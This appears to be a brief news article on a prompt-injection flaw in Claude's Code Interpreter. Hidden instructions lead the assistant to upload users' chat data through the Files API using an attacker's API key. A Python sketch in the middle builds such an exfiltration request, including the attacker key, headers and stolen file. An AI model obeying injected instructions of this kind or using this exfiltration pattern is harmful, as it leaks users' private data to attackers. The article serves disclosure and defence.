A critical flaw in Anthropic's Claude AI allows attackers to steal user data by exploiting the platform's own Files API.
A security researcher discovered that hidden commands can hijack Claude's Code Interpreter, tricking the AI into sending sensitive data, such as chat histories, directly to an attacker.
In effect, the AI's own tools are turned against its users: the chained exploit routes stolen data out through infrastructure the platform itself trusts.
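The shape of such a chain can be sketched at a high level. The snippet below is a hypothetical illustration, not the researcher's actual payload: it assumes the sandbox permits requests to api.anthropic.com, and that the injected instructions carry an attacker-supplied API key so any upload lands in the attacker's account rather than the victim's. The request is only constructed here, never sent, and the key, filename, and beta header value are assumptions for illustration.

```python
# Hypothetical sketch of the exfiltration pattern described above.
# Assumption: the sandbox blocks most network egress but trusts
# api.anthropic.com, so a hijacked Code Interpreter can "legitimately"
# upload files there -- authenticated with the ATTACKER's key.

ATTACKER_API_KEY = "sk-ant-attacker-key-EXAMPLE"  # planted via the injected prompt

def build_exfil_request(stolen_text: str) -> dict:
    """Construct (but never send) the upload request a hijacked
    interpreter would issue against the file-upload endpoint."""
    return {
        "method": "POST",
        "url": "https://api.anthropic.com/v1/files",
        "headers": {
            # Attacker's key, not the victim's: the file lands in
            # the attacker's account.
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",  # assumed beta flag
        },
        # Multipart file field carrying the harvested conversation data.
        "files": {"file": ("notes.txt", stolen_text)},
    }

req = build_exfil_request("victim chat history ...")
```

The key point the sketch makes is that no exotic channel is needed: the data leaves through an API call the platform expects its own tools to make, which is what makes this class of exfiltration hard to block.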
Anthropic initially dismissed the report on October 25, but later acknowledged the issue on October 30, citing a "process hiccup."